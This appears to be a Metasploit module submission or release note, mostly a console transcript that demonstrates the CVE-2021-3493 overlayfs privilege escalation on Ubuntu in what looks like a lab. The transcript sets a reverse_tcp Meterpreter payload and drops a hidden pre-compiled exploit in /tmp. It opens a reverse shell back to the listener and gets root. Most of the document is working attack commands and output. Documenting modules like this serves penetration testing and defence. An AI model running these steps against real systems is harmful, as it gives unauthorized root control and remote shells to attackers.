[*] Starting interaction with 8...

meterpreter > sysinfo
Computer     : 10.5.132.102
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

Linux 18.04 aarch64

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                       Information                Connection
  --  ----  ----                       -----------                ----------
  7         meterpreter python/linux   msfuser @ ubuntu-20042x64  10.5.135.101:6525 -> 10.5.132.102:56584  (10.5.132.102)
  9         meterpreter aarch64/linux  msfuser @ 192.168.122.36   10.5.135.101:5424 -> 10.5.132.107:46520  (::1)

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
session => 9
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set target aarch64 
target => aarch64
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION  9                yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   aarch64


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set payload linux/aarch64/meterpreter
set payload linux/aarch64/meterpreter/reverse_tcp    set payload linux/aarch64/meterpreter_reverse_https
set payload linux/aarch64/meterpreter_reverse_http   set payload linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set payload linux/aarch64/meterpreter/reverse_tcp 
payload => linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Unprivileged user namespaces are permitted
[*] Version array: ["4.15.0", "135", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 135
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.C13Fb2Ika
[*] /tmp/.C13Fb2Ika created
[*] Detected architecture: aarch64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.aarch64.elf on system...
[*] Writing '/tmp/.C13Fb2Ika/.n1Sc4o7F5' (14288 bytes) ...
[*] Writing '/tmp/.C13Fb2Ika/.jKFExJKlb' (332 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.C13Fb2Ika/.n1Sc4o7F5 /tmp/.C13Fb2Ika/.jKFExJKlb /tmp/.C13Fb2Ika KYaOsFfj
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (920356 bytes) to 10.5.132.107
[+] Deleted /tmp/.C13Fb2Ika/.n1Sc4o7F5
[*] Meterpreter session 10 opened (10.5.135.101:4444 -> 10.5.132.107:58642 ) at 2021-12-02 09:49:00 -0600
[*] 

meterpreter > getuid
Server username: root

[dwelch-r7]

Release Notes

Adds a module for the CVE-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 - 20.10